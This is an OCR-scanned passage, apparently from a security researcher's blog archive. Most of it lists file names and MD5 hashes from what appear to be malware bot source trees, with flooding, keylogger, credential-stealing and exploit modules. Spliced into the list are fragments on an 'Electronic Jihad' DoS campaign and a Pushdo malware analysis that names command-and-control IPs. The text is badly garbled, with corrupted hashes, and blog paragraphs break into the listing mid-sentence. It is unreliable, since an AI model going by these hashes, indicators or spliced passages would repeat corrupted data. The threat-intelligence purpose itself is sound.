6da24eb0d8dd06a6d50a32a6cb1e40c0 
Crc.cpp 
2786243daf6312da22f3538e4947edbc 
Crc.h 
5781152c02daf5a2fe7d7709d95bb32d 
Cry.cpp 
6ad02c5168ee450101b791c210dc5aee 
Cry.h 
a881bab6bae2712c9c7a85ef76b8cd9F 
d3des.c 
71e83b68e095b59f2d50deee79d73be7 
d3des.h 
9ee5266e6b0bdc93bb84f722d8106a89 
ddos.cpp 94ff8a073dba6f06d26282f3251184d9 
ddos.h 
6d0bd71df3efcOflb04cc306a5b6daa7 
Def.h 
aab5f4b3e907e50596b24e00b4dfe31a 
encrypt.exe 
e20f3260419d966d4393fac3ab17654c 
Ext.h 
645d9e31b227303ae6d0c4c1b064b68b 
firefox.cpp 
d9eee4d2943ba9d6b328ee152cdd54cf 
firefox.h 
183da628acccfc6a201a517831dc694e 
ftpd.cpp 3bf771304e33a8579748cda54ba86b7f 
ftpd.h 
48a891506c957340b207b627105d7bb4 
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Fun.h 
440e886fc49ea819de19d3764ed02822 
Glo.h 
1029d7287e9ab1082bc8dc25ce19da09 
icmpflood.cpp 
7419998da929571161ccd1de532ee36f 
icmpflood.h 
b6eb3d97b865749fb06229dfa96ceb35 
Ide.cpp 

30573e6f9dee53f7 70e024a2e4eb80ab 
Ide.h 
75d8953e6d01b52019a214d8523015ef 
Inc.h 
57245b0efd8ef73d639d6519e75d6314 
Key.cpp 
5909c7e958972bc6ef1f09f091bb7ae3 
Key.h 
ed4bbf2f6163ebdeabc1f046570e3al14 
Ldil.cpp 780937752ae621cbbele66dc50a1297f 
Ldll.h 
af5283b007bed5d270563dd3d26fd4d7 
lipbmysql.dll 
€169981c4ea5d7a18d56631bf6801cf1 
multipletopic.cpp 
f666e77dc75758962f3eeefafc863058 
multipletopic.h 
810bdeabfc6b315297e8a554ebe5b450 
mysalclient.lib 
1e2d9bd682e97f9205c90fd9ae9b19b1 
passwd.h d8aa5b6f45d222990d9292a5422cfl1l3a 
patcher.cpp 
e82cb7483684flde15a1474603e78dc7 
patcher.h 
1b9c948ce0abb38d2d3dd04312c6b975 
pingudp.cpp 
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fa736effbc98c949f19a232deebd8bf0 
pingudp.h 
fd76799bd10dc3867fbe54142fb006b4 
pstore.cpp 
f6073abaled5e153ac78344ddedal5e4 
pstorec.tih 
b89c05a4531df0fd30c67bfcecc62e01 
pstorec.tli 
92fdb3bb3207336cf4bb5bb64b6f0fa8 
redpill.cpp 
ale52e17c6739c766016bb12a954ea44 
redpill.h 
4bd510deb64d4947ea8014ffebe7c655 
rfb.h 
c27f18887063e12bd6c7b29d65f569c6 
Rnd.cpp 
7d3d8d20f3152b39d3365da70f2fc5c4 
Rnd.h 
da9cf1b87ab3420c8a8922d0f9e485b8 
Shel.cpp 18d8f5f2654a75032f6d807b990ba883 
Shel.h 
310578d8283281cbO0fc8848cbf84bc27 
sniff.cpp 
€469al1f944f47376f9de3a66dbd9b1e3 
sniff.h 
11d8102e4bd5894f464463f53308677f 
socks4.cpp 
6d4bb6c17461a0c73d866cdee00ecf2c 
socks4.h bb3819059e393e2c1lc22ba8fe213cf0d 
socks5.cpp 
689ad1bd33927f83034b3eeld5bac7da 
socks5.h 463b46038510aa2a32bcf2f2294264f5 
Str.h 
69ae25bd41a6b38a83b69f351e14e7df 


synflood.cpp 
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262cbca3f1961b8519a62730f1cOc26d 
synflood.h 
fb1360b919e6a41dd020d7bf67266e77 
Sys.cpp 
50002f7fca7c24a21d7579154b1601ec 
Sys.h 
35d55192a2b2be2e18281531bb585b5c 
Tcp.h 
d8e4b41a7b108729093ec7e28586c1b8 
tcpflood.cpp 
397571559ed9f6d7a578beb6f15ac5f36 
tcpflood.h 
5882e76351bd1bd62735653778234e8e 
tcpflood2.cpp 
c1886e982ffd61439f8df1279e1770a4 
tcpflood2.h 
aec74ba18c2502e78a761a0564087eed 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 78275d2c06e31b707994d6c05089e830 
Test.h 
c524a604f170338dd6134048d4e1c7f4 
Thr.cpp 
698b1e10bdd55be88ba418ea3bfd23b4 
Thr.h 
88a18acef7291fdcl4eefef3dbae7381 
ver.c 
401a08653c21dcdcdaabedd68fc410b3 
ver.h 
66a5b12d97008a36ce5abaee831felf2 
120.bsc 
f127b40db5473ddbelecef2f7448331a 
120.exe.PreARM 
5ea4e6b8blae36b0ff3af43b24b7194e 
120.obj 
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31c0347442a4fb031465d92e8c4f494b 
120.pch 
cc5f247f6b5e0ff238910eeb5c3056bd 
120.res 
40fb6c1740cfbd63ba4282e9bba08425 
120.sbr 

130sqlrem.exe 
ef4d6c333bfe622bd7661ce2fbda74c4 


2100.exe d62123d4fc8f47b5e305f85254c3f0ea 


999mysql.exe 
a83d9291c05f2c4e9ald1b61d44065f2 
Adv.obj 
f9618e9c90dff129206aaf36cf6d60ff 
Adv.sbr 

Asn.obj 
62d6720d455a12fd54ba332c54023f3d 
Asn.sbr 

Crc.obj 
ddb4f964c2f182b22e040933da100019 
Crc.sbr 

Cry.obj 
42fcfcd007e369e1d58c4e70c6c52b86 
Cry.sbr 

d3des.obj 
fe21eca67b5552bc72576887 7acefa32 
d3des.sbr 

dcass.obj 
f28683604ed0256f8f7891230d82c4c0 
dcass.sbr 

dcom.obj 
c7ddcf1212fe729f8ac94510d1b24102 
dcom.sbr 

ddos.obj 
9d16585856142c3bc84aa317aaf2223a 
ddos.sbr 
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firefox.obj 
a8643f220059caf4d8067b93bfc2ed77 
firefox.sbr 

ftpd.obj 
109815a9d7a78a042e360f3f318de0eb 
ftpd.sbr 

icmpflood.obj 
45bb445cf7a033d754c3e9131b2225fe 
icmpflood.sbr 

Ide.obj 
f6d76512e56fb4ecf74bb8af7c8249ab 
Ide.sbr 

Key.obj 
cfa069a56c7263f3bd6433b314f8e2df 
Key.sbr 

Ldll.obj 
2a99b14df4a8d1bac5e142c3f88d4fa8 
Ldll.sbr 

Isass.obj 
bb17bda7d54895c1la77004314aff7e03 
Isass.sbr 

mssql.obj 
f687ee2866fdd4f00ba01e9239502997 
mssql.sbr 

multipletopic.obj 
5ceb432acae8ad56e8f4b04e2a46ca02 
multipletopic.sbr 

mysqludf.obj 
7a7963e8d8e593a967b3283f6f4ed4d5 
mysqludf.sbr 

Netapi.obj 
5b88e49f1b0f62d7c88c631bbcb8b49b 
Netapi.sbr 

netbios.obj 
bd942745a6616ae21626149c381570aa 
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supporting the war in Iraq, palestine and Afghanistan, and it was hacked because you are killing 
our people and our kids in Irag, palestine and Afghanistan , and It was hacked because they 
invaders our land and they vandals our homes and hacked your sites is our solution." 


_Alansar Fantom 


In direct coordination with The Designer and Al-Ansar Hackers Team, basically a low-profile 
script kiddie that’s also involved in spreading the campaign message and the flood tools to be 
used in eh Electrnic Jihad campaign. 


Offensive cyber terrorism on behalf of terrorists in the sense of cyber mujahideens is over- 
hyped if they’re to do it on their own given the factual based evidence of their current state of 
technical know-how, with the Electronic Jihad program among the most recent such overhyped 
threats. Defensive cyber terrorism as an extension of cyber jihad in [3]an asymmetric nature, 
is what is going on online for the time being, and has been going on for the last couple of years. 


The bottom line, script kiddies cyber jihadists dominate, PSYOPS fill the gaps where there’s 
zero technical know-how, mentors are slowly emerging and providing [4]interactive tutorials 
to reach [5]a wider audience, [6]localization of knowledge from English2Arabic is taking 
place the way propaganda is also localized from Arabic2English, and there’s also an ongoing 
networking going on between cyber jihadists and [7]Turkish hacktivists converting into such 
on [8]a religious level. Case in point - MuslimWarriors.Org defacement campaigns with 
"anti-infidel" related messages. 


1. http: //ddanchev. blogspot .com/2007/08/cyber-jihadist-dos-tool.htm 


2. http: //ddanchev. blogspot .com/2007/11/electronic- jihad-v30-what-cyber- jihad .htm 


3. http: //ddanchev. blogspot .com/2007/12/combating-unrestricted-warfare.htm 


4. http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


5. http: //ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two. html 
6. http: //ddanchev. blogspot .com/2007/11/teaching-cyber- jihadists-how-to-hack.htm 


7. http: //ddanchev. blogspot .com/2007/11/overperforming-turkish-hacktivists.htm 
8. http: //ddanchev. blogspot .com/2007/11/mass-defacement-by-turkish-hacktivists.htm 


3.12.13 Pushdo - Web Based Malware as Usual (2007-12-19 23:45) 


Interesting [l]assessment, especially the explanation of the GET variables, however, such 
descriptive use of POST variables to a malware’s C &C server have been around for the last 
couple of years. What has logically changed is the added layer of obfuscation and complexity 
to make it hard to assess what does such a URL actually mean : 


"The malware to be downloaded by Pushdo depends on the value following the "s-underscore" 
part of the URL. The Pushdo controller is preloaded with multiple executable files - the one we 
looked at contained 421 different malware samples ready to be delivered. The Pushdo con- 
troller also uses the GeolP geolocation database in conjunction with whitelists and blacklists of 
country codes. This enables the Pushdo author to limit distribution of any one of the malware 
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netbios.sbr 

patcher.obj 
c6d5c9ddab547780e4c363a0798660b2 
patcher.sbr 

pingudp.obj 
689ba2e47b0b844bbcf3c1617d320dfO 
pingudp.sbr 

pstore.obj 
2b05633c6fbfcO07400200cc3f22e2914 
pstore.sbr 

pstorec.tlh 
c2d7c80a4edf38d179b018742182a162 
pstorec.tli 
481b74754959855b0a72656e2e100247 
random.obj 
f8e506f8a558cc5ablaa4e22f868dcc7 
random.sbr 

Rnd.obj 
b01d4c2e494e785b66f0ald16a6elfbe 
Rnd.sbr 

Shel. obj 
3c1e412e757ea41c7d2b098f85edfdbc 
Shel.sbr 

sniff.obj 
1f2e7031aa6642745d2e27a9a58al11c 
sniff.sbr 

socks4.obj 
f8647b2db4c715b5574c1e94516029cd 
socks4.sbr 

socks5.obj 
17988003a5fd48eda807beef681lee(fd 
socks5.sbr 

Sym.obj 
c35eb8df7d40602678f220ebb7fb222a 
Sym.sbr 
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synflood.obj 
65bb179cea9e94c1061a174370a42659 
synflood.sbr 

Sys.obj 
€93a39dd168190977a3d2f140c34405b 
Sys.sbr 

tcpflood.obj 
f49f35c86b09ad973ff1c37738d3bd2c 
tcpflood.sbr 

Test.obj 
1lc7eff8d4c409e30ebbca41b46901f25 
Test.sbr 

Thr.obj 

4456292 8ff44a37deb6a08fe5bd29897 
Thr.sbr 

vc60.idb 
112882d90a6a99c0792bf62368d6edb2 
ver.obj 
4c34f30b918e83701f6e9988b596e6bf 
ver.sbr 

vncshit.obj 
ab54dfa057789ac56b14ba1da3873b2f 
vncshit.sbr 

120.exe 
93824d4272656be29a94e17993afacec 
config-netware.h 
9cb9d52a63dcOdf82da16409b9d1f70d 
config-os2.h 
2b62c56563ab1133cc267eceflb938e6e 
config-win.h 
dc0ca9225e2c3d764b4d9d1d6d1ab727 
errmsg.h 8f2b20fdab8de520880bf2dc7814b2e6 
libmysql.def 
0c993059af70b43b50321133fbe19f32 
mysql.h 

12354 


6fdd53f93bc90d04778f1416ddc499e4 
mysqld _ername.h 
907bf7c7852ae9a2060413bd28a87919 
mysqld _error.h 
58b01507bc47875af26724bb870b4c1b 
mysql com.h 
43ad0e29782ba3d1f93f112al1fcO3fcc 
mysql embed.h 
29fc68e312d44d37d1c2bb3627a038cd 
mysql _time.h 
46d79f4d7273572eb2ab18634817a5be 
mysql _version.h 
d563ea3a6e926c8f84752c8eeIae8e8e 
my _alloc.h 
18f883ad9be9ef2al1bc7e497a337fcf3 
my _dbug.h 
fe5931b956e80276cb891fc10d736eaf 
my _getopt.h 
20de8bce9f9c5e0d4982daeb4168f47d 
my _global.h 
4e9bf1c025f9fe9dadf92d07a2653ad6 
my _list.h 
219eedde35ec3229532ef498c8c44918 
my _pthread.h 
880bda4b0c6465026bb5e40880e31711 
my _sys.h 
dd2f31eb9f493cc2335869b187a321fb 
m _ctype.h 
7c57dfe565c1d7c6782db255dabd373a 
m__string.h 
91a15559c26d7a24301624684235c0c4 
raid.h 
a317d6a83d68fac3a507c4af2d9aa4e6 
typelib.h 
d82901bddd0dde186b06965aa7e74912 
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Asn.cpp 
f088170107f295c191laeOlede72da3f6 
Asn.h 
5ccOaalfc8eef942bc1f242d78ad6406 
dcass.cpp 
5110456c45646a9b87004abdc88d265f 
dcass.h 
717dca288c88619445df69d3cbc0e855 
dcom.cpp 7a679ad1cla3e266f985cd10866a0646 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
Isass.cpp 
83d9cd154f44dec73c8e7fc7d5755fbb 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
mssql.cpp 
9307cbdd41b727bea3818ff2a5acb100 
mssql.h 
aec3dd624eb817fd1b14003fccf41211 
mysqlcracker.cpp 
675a30f6d6a1f2b50142d75788b5c212 
mysqludf.cpp 
eaeldf08ca719a7db775d02bf73545f4 
mysqludf.h 
e1805fe9e44cbe4c9af32a3ccb241f64 
Netapi.cpp 
0f096d52fd604cda9169fd95119c38e8 
Netapi.h d6fd475b01lefac5495aec9dc7389272c 
netbios.cpp 
916ffde06c0e6616ed7502591fe8e344 
netbios.h 
b93534ce7fada1d84f39b159409c2d82 
pstore.cpp 
18093bb2c3de4cca6b1f20affa8c3394 
random.cpp 
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16ea1a01bcd009592892f1f951d6bff6 


random.h 89181196laae00fb762c7b242c29fc64 


Sym.cpp 
7536a751ca2f768b976532d925e61170 
Sym.h 
90ed550c2cb10791b946bc4b413c1a9c 
vncshit.cpp 
4fedeaa3878d07f89c34caaeb9071971 
vncshit.h 
b80931628ac3f1f40bd04301d9c0e09e 
120.cpp 
3669cb3a9d9d1619b9caa5a43b79421e 
120.dsp 
c11966cb027265a86118c8da3493d1cl1 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
00a606e7ef559677c3d38666ba7 72269 
120.ico 
bb8ebc5032fccbcacccf67da07489d64 
120.ncb 
7674b6fa3c47b1cad30485b165749191 
120.opt 
716019000ad4e1e849590ff36f05a706 
120.plg 
e09fe35b32a6801f4cd34feed5820b24 
120.rc 
78837375ecOc5a62dfe2ef30c6fc05el1 
1lreadme.txt 
1ea50a30e77726f7d71e43b91d40477b 
Adv.cpp 
7da39e2d3733c19122daae28e29c8ef4 
Adv.h 
cf8516f8818d1fbd3665ba3023040d21 
CleanUp.bat 
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d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
2cc8df47f7685e9624b0fe7f7ecf516a 
Conf.h 
ff5a575f087b6f2acbd48f047c9b5374 
Crc.cpp 
2786243daf6312da22f3538e4947edbc 
Crc.h 
5781152c02daf5a2fe7d7709d95bb32d 
Cry.cpp 
6ad02c5168ee450101b791c210dc5aee 
Cry.h 
a881bab6bae2712c9c7a85ef76b8cd9F 
d3des.c 
71e83b68e095b59f2d50deee79d73be7 
d3des.h 
9ee5266e6b0bdc93bb84F722d8106a89 
ddos.cpp 94ff8a073dba6f06d26282f3251184d9 
ddos.h 
6d0bd71df3efcOf1b04cc306a5b6daa7 
Def.h 
aab5f4b3e907e50596b24e00b4dfe31a 
encrypt.exe 
e20f3260419d966d4393fac3ab17654c 
Ext.h 
645d9e31b227303ae6d0c4c1b064b68b 
firefox.cpp 
d9eee4d2943ba9d6b328ee152cdd54cf 
firefox.h 
183da628acccfc6a201a517831dc694e 
ftpd.cpp 60ac899638c9d6378308e905b4f68b9e 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
440e886fc49ea819de19d3764ed02822 
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Glo.h 
1029d7287e9ab1082bc8dc25ce19da09 
icmpflood.cpp 
7419998da929571161ccd1de532ee36f 
icmpflood.h 
b6eb3d97b865749fb06229dfa96ceb35 
Ide.cpp 
30573e6f9dee53f770e024a2e4eb80ab 
Ide.h 
75d8953e6d01b52019a214d8523015ef 
Inc.h 
6c1bd83a648d1fb08f0e2ac3dcf3e21a 
Key.cpp 
5909c7e958972bc6ef1f09f091bb7ae3 
Key.h 
ed4bbf2f6163ebdeabc1f046570e3al14 
Ldil.cpp 780937752ae621cbbele66dc50a1297f 
Ldll.h 
af5283b007bed5d270563dd3d26fd4d7 
lipbmysql.dil 
€169981c4ea5d7a18d56631bf6801cf1 
multipletopic.cpp 
fc8c4d54be5a6e3592c0eeabc14e4305 
multipletopic.h 
810bdeabfc6b315297e8a554ebe5b450 
mysalclient.lib 
1e2d9bd682e97f9205c90fd9ae9b19b1 
passwd.h cab2d96a08cb8572f2f8b796035/7fcca 
patcher.cpp 
e82cb7483684flde15a1474603e78dc7 
patcher.h 
1b9c948ce0abb38d2d3dd04312c6b975 
pingudp.cpp 
fa736effbc98c949f19a232deebd8bf0 
pingudp.h 
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fd76799bd10dc3867fbe54142fb006b4 
pstore.cpp 
f6073abaled5e153ac78344ddedal5e4 
pstorec.tlh 
b89c05a4531df0fd30c67bfcecc62e01 
pstorec.tli 
92fdb3bb3207336cf4bb5bb64b6f0fa8 
redpill.cpp 
ale52e17c6739c766016bb12a954ea44 
redpill.h 
4bd510deb64d4947ea8014ffebe7c655 
rfb.h 
c27f18887063e12bd6c7b29d65f569c6 
Rnd.cpp 
7d3d8d20f3152b39d3365da70f2fc5c4 
Rnd.h 
da9cf1b87ab3420c8a8922d0f9e485b8 
Shel.cpp 18d8f5f2654a75032f6d807b990ba883 
Shel.h 
310578d8283281cb0fc8848cbf84bc27 
sniff.cpp 
e469a1f944f47376f9de3a66dbd9b1le3 
sniff.h 
11d8102e4bd5894f464463f5330867/7f 
socks4.cpp 
6d4bb6c17461a0c73d866cdee00ecf2c 
socks4.h bb3819059e393e2c1c22ba8fe213cfOd 
socks5.cpp 
689ad1bd33927f83034b3eeld5bac7da 
socks5.h 463b46038510aa2a32bcf2f2294264f5 
Str.h 
69ae25bd41a6b38a83b69f351e14e7df 
synflood.cpp 
262cbca3f1961b8519a62730f1cOc26d 
synflood.h 
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fb1360b919e6a41dd020d7bf67266e77 
Sys.cpp 
50002f7fca7c24a21d7579154b1601lec 
Sys.h 
35d55192a2b2be2e18281531bb585b5c 
Tcp.h 
d8e4b41a7b108729093ec7e28586c1b8 
tcpflood.cpp 
397571559ed9f6d7a578be6f15ac5f36 
tcpflood.h 
5882e76351bd1bd62735653778234e8e 
tcpflood2.cpp 
c1886e982ffd61439f8df1279e1770a4 
tcpflood2.h 
aec74ba18c2502e78a761a0564087eed 
tcpip.h 
3464effd01374f2732b9c95252af9740 


Test.cpp 78275d2c06e31b707994d6c05089e830 


Test.h 
c524a604f170338dd6134048d4el1c7f4 
Thr.cpp 
698ble10bdd55be88ba418ea3bfd23b4 
Thr.h 
88al18acef7291fdc14eefef3dbae7381 
ver.c 
401a08653c21dcdcdaabedd68fc410b3 
ver.h 
66a5b12d97008a36ce5abaee831felf2 
120.bsc 
1f48abe164e3c7391769d0be5f4ce5de 
pstorec.tlh 
c2d7c80a4edf38d179b018742182a162 
pstorec.tli 
481b74754959855b0a72656e2e100247 
config-netware.h 
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9cb9d52a63dcO0df82da16409b9d1f70d 
config-os2.h 
2b62c56563ab1133cc267eceflb938e6e 
config-win.h 
dc0ca9225e2c3d764b4d9d1d6d1lab727 
errmsg.h 8f2b20fdab8de520880bf2dc7814b2e6 
libmysql.def 
0c993059af70b43b50321133fbe19f32 
mysql.h 
6fdd53f93bc90d04778f1416ddc499e4 
mysqld _ername.h 
907bf7c7852ae9a2060413bd28a87919 
mysqld _error.h 
58b01507bc47875af26724bb870b4c1b 
mysql _com.h 
43ad0e29782ba3d1f93f112alfcO3fcc 
mysql _embed.h 
29fc68e312d44d37d1c2bb3627a038cd 
mysql _time.h 
46d79f4d7273572eb2ab18634817a5be 
mysql _version.h 
d563ea3a6e926c8f84752c8ee9ae8e8e 
my _alloc.h 
18f883ad9be9ef2albc7e497a337fcf3 
my _dbug.h 
fe5931b956e80276cb891fc10d736eaf 
my _getopt.h 
20de8bce9f9c5e0d4982daeb4168f47d 
my _global.h 
4e9bf1c025f9fe9dadf92d07a2653ad6 
my _list.h 
219eedde35ec3229532ef498c8c44918 
my _pthread.h 
880bda4b0c6465026bb5e40880e31711 
my _sys.h 
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loads from infecting users located in a particular country, or provides the ability to target a 
specfic country or countries with a specific payload." 


This is an excerpt from a previous post on "[2]Botnet Communication Platforms" including var- 
ious graphs courtesy of botnet masters circa 2004/2005 : 


localhost MySQL: (frorn getemd.php) 


ELECT cmd FRO M bots WHERE uid=Al 
Ss c. - 


a3 Po GET /getermd.php?uid=Al " 
Zz 


onfected 
machine 


®. |Get /qeternd.php?uid=A2 _——— 


<< 


many O Peer od 
eae A2 ar __ hittp://botnet.org/ to all bots! packet 


machine st hacker 


Pr) [GET /getcmd.phpruic=As | = 
3S” A3/ 


infected & 
machine 


"The possiblities with PHP and MySQL in respect to flexibility of the statistics, layered encryption 
and tunneling, and most importantly, decentralizing the command even improving authentica- 
tion with port knocking are countless. Besides, with all the buzz of botnets continuing to use 
IRC, it’s a rather logical move for botnet masters to shift to other platforms, where communi- 
cating in between HTTP’s noise improves their chance of remaining undetected. Rather ironic, 
the author warns of possible SQL injection vulnerabilities in the botnet’s command panel." 


Here’re some C &C IPs related to Pushdo : 
208.66.195.71 

208.66.194.242 

66.246.252.215 

66.246.252.213 

66.246.72.173 

67.18.114.98 

74.53.42.34 

74.53.42.61 

talkely.com 


Talkely.com (217.14.132.178) is also responding to arenatalk.net and worldtalk.net. There’s 
also another bogus message next to the one mentioned in SecureWorks analysis - and it’s 
"Under Construction Try google". 


Related posts on Web Based Malware : 
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dd2f31eb9f493cc2335869b187a321fb 
m __ctype.h 
7¢c57dfe565c1d7c6782db255dabd373a 
m _string.h 
91a15559c26d7a24301624684235c0c4 
raid.h 
a317d6a83d68fac3a507c4af2d9aa4e6 
typelib.h 
d82901bddd0dde186b06965aa7e74912 
Asn.cpp 
f088170107f295c191laeOlede72da3f6 
Asn.h 
5ccOaalfc8eef942bc1f242d78ad6406 
dcass.cpp 
5110456c45646a9b87004abdc88d265f 
dcass.h 
717dca288c88619445df69d3cbc0e855 


dcom.cpp 7a679ad1icla3e266f985cd10866a0646 


dcom.h 
b2792e423f3ec732793723d53a0e12c8 
Isass.cpp 
83d9cd154f44dec73c8e7fc7d5755fbb 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
mssql.cpp 
be3f61fa85f3376b5b70e3f0731a9d89 
mssqlI.h 
aec3dd624eb817fd1b14003fccf41211 
mysqludf.cpp 
54f4de6ac55b6ebeeb92366f1lcb38f6b 
mysqludf.h 
c2f7ac3c63c3f6ce4c7e9163dd7a5fd4 
Netapi.cpp 
0f096d52fd604cda9169fd95119c38e8 
Netapi.h d6fd475b01lefac5495aec9dc7389272c 
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netbios.cpp 
916ffde06c0e6616ed7502591fe8e344 
netbios.h 
b93534ce7fadal1d84f39b159409c2d82 
pstore.cpp 
18093bb2c3de4cca6b1f20affa8c3394 
random.cpp 
16ea1a01bcd009592892f1f951d6bff6 
random.h 89181196laae00fb762c7b242c29fc64 
Sym.cpp 
7536a751ca2f768b976532d925e61170 
Sym.h 
90ed550c2cb10791b946bc4b413c1a9c 
vncshit.cpp 
4fedeaa3878d07f89c34caaeb9071971 
vncshit.h 
b80931628ac3f1f40bd04301d9c0e09e 
advscan.cpp 
de9549a8d04ad521987f327c71d9890f 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
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capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f867 74ae3ea965f6c 
configs.h 
a57d5fe42b2e171309a10a940232f84e 
crc32.cpp 
3771¢c5b3f6992c43c0e12a57c41a727e 
crc32.h 
lcd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
56c687fde3f816d647352c06717eb343 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
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defines.h 
6ee19571472087e539ae0eab29ab9fb9 
download.cpp 

664845639 lLaff5fbb872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bcab61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 

6efOd2ffff7 5a9b4aflbe7159d6fc26e 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp e324aff6c71758273cbd995939898b1f 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
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3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1l1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
advscan.cpp 
b50a5b6585d66d156184d1a86c9ffbfd 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce9 2eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
69c476987459336dc47d8d24c90f4800 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
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crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
O0e8cd32d6c5dbb0546c57d7fd213b365 
dcass.cpp 
9ee06759e2825alca0fc3aa004057eec 
dcass.h 
717dca288c88619445df69d3cbc0e855 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp 2262ea03ec74e3b10b428e2d114e589b 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
c7218b48fbe0425baa666dc891535d31 
download.cpp 

664845639 lLaff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
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6efOd2ffff75a9b4aflbe7159d6fc26e 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp c065b5a9638115729cc01613e48338c9 


ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
€2598e0c09c15c633762290Ff70f498fd 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
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irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
b3d86a63eaa512289f087475faeaabd3 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
Isass2.cpp 
